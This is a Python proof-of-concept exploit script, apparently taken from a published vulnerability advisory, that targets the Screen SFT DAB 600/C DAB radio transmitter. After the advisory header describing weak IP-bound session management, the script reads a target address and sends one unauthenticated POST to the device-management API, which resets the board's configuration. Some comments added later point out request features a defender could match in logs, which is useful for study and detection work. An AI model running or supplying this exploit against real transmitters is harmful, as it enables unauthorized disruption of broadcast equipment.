#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. Because the IP address property is
# bound to the Session ID, one needs to wait for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5775
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php
#
#
# 19.03.2023
#

# Proof-of-concept layout: print the banner, take the transmitter address,
# then issue the single POST that the advisory describes. No other logic.

import datetime
import hashlib  # not referenced below; kept because the original imports it

import colorama
import requests
from colorama import Fore, Style

# Enable ANSI colour handling on terminals that need it (Windows).
colorama.init()

# Banner text is reproduced byte-for-byte; only the wrapping differs.
_BANNER = '''
█████████████ ██████ ██ █████ █████████████ ██████
██ ██ ██████████ ██ ████ ██ ██ ██ ████ ██
███████████ ██ ████ ██ ██ ██ ████ ██ ██ █████ ██████
██ ██ ████████ ██ ████ ██ ██ ██ ████ ██
██ ██ ███████ ████ ██ ██ ████ █████████████ ██ ██
'''
_NOTICE = '''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
print(f"{Fore.RED}{Style.BRIGHT}{_BANNER}{Style.RESET_ALL}")
print(f"{Fore.WHITE}{Style.BRIGHT}{_NOTICE}{Style.RESET_ALL}")

# Timestamp is purely informational (local time, no timezone).
started_at = datetime.datetime.now().strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', started_at)

# Target address is taken verbatim from stdin; no validation is performed,
# exactly as in the original script.
host = input('Enter transmitter ip: ')
endpoint = '/system/api/deviceManagement.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: deviceManagement::reset')
url = f'http://{host}{endpoint}'

# Request headers. Values are fixed and identical to the original; the
# 'User-Agent' and 'Accept-Language' values are distinctive enough that a
# defender can match this PoC in web-server or proxy logs on the device.
headers = {
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'ku-MK,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate',
    'User-Agent': 'Dabber--',
    'Connection': 'close',
}

# Body of the deviceManagement call. Note that 'reset' is sent as the
# string 'true', not a JSON boolean — the device evidently accepts that.
# For detection purposes this JSON shape (ssbtType/ssbtObj.reset) POSTed to
# the endpoint above is the event worth alerting on.
payload = {
    'ssbtIdx': 0,
    'ssbtType': 'deviceManagement',
    'ssbtObj': {'reset': 'true'},
}

# One unauthenticated POST; no timeout and no exception handling, as in the
# original. Only the HTTP status is inspected.
response = requests.post(url, headers=headers, json=payload)
print('Done.' if response.status_code == 200 else 'Error')

# NOTE(review): in this reconstruction exit(-1) is at top level and runs on
# both outcomes; the collapsed source does not show whether the author had
# it indented under the 'Error' branch instead — confirm against the advisory.
exit(-1)